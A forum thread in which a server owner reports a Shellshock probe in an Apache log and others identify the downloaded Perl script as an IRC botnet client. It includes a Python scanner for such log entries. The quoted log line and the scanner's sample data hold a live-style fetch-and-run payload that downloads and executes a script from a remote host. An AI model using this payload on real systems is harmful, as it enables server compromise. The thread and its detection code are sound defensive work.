
bash shellshock jurat Perl script


I saw the following line under /var/log/apache2/access_log:

    "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

I had not gotten around to patching bash yet. I shut down the machine immediately.

Has anyone seen this in their logs and/or examined the Perl script found at http://213.5.67.223/jurat? It seems fairly benign, but I want to know how worried I should be.

On line 338 you can see the shell function executes a shell command that was fetched from someone on the other end of an IRC channel:

    my @resp=`$comando 2>&1 3>&1`;

This is executed with the same user level as the apache server. I just hope they were not able to escalate privileges.
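As an added defender-side example (not code from the question or from the jurat script): a small Python scanner that parses Apache combined-format access_log lines, flags the `() {` function-definition prefix in the Referer and User-Agent fields, which is what triggers Shellshock when Apache passes those headers to a CGI script as environment variables, and pulls out the URLs the payload tries to fetch. The log lines are constructed for the example; 203.0.113.9 is a documentation address standing in for the real download host.

```python
import re

# Apache "combined" log format. Referer and User-Agent may contain \" escapes,
# which is how Apache records the quotes inside a Shellshock payload.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"'
)

# The Shellshock trigger: a bash function definition "() {" at the start of a
# value that mod_cgi exports into the environment (HTTP_USER_AGENT, HTTP_REFERER).
SHELLSHOCK = re.compile(r'\(\s*\)\s*\{')
URL = re.compile(r'https?://[^\s;"\'\\]+')

# Constructed sample lines: the first mirrors the request quoted above, the
# second is benign traffic, the third carries the probe in the Referer field.
SAMPLE_LOG = r'''
10.0.0.5 - - [25/Sep/2014:10:11:12 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://203.0.113.9/jurat;curl -O /tmp/jurat http://203.0.113.9/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
10.0.0.7 - - [25/Sep/2014:10:12:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.8 - - [25/Sep/2014:10:13:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { ignored; }; echo vulnerable" "curl/7.30"
'''

def scan_log(text):
    """Return one dict per header field that carries a Shellshock payload."""
    hits = []
    for line in text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ('referer', 'user_agent'):
            value = m.group(field).replace('\\"', '"')  # undo Apache's escaping
            if SHELLSHOCK.search(value):
                hits.append({
                    'ip': m.group('ip'),
                    'request': m.group('request'),
                    'field': field,
                    'payload': value,
                    # hosts the payload downloads from: block/hunt for these
                    'urls': sorted(set(URL.findall(value))),
                })
    return hits

if __name__ == '__main__':
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ip']} {h['field']} in {h['request']!r} fetches {h['urls']}")
```

A 404 on the CGI path, as in the log line above, means this particular request found no script to run; the same header against an existing CGI script is where the environment-variable import actually matters.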


Solution

  • I haven't looked at the details, but it doesn't look benign to me:

    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
    

    This looks to me like some kind of botnet script. Scary. Get patched up, people.

    UPDATE: The analysis in this blog:

    "If the script is successfully executed then the infected host will connect to an IRC channel hard coded in the script and wait for commands."

    That's badder than Baddy McBad.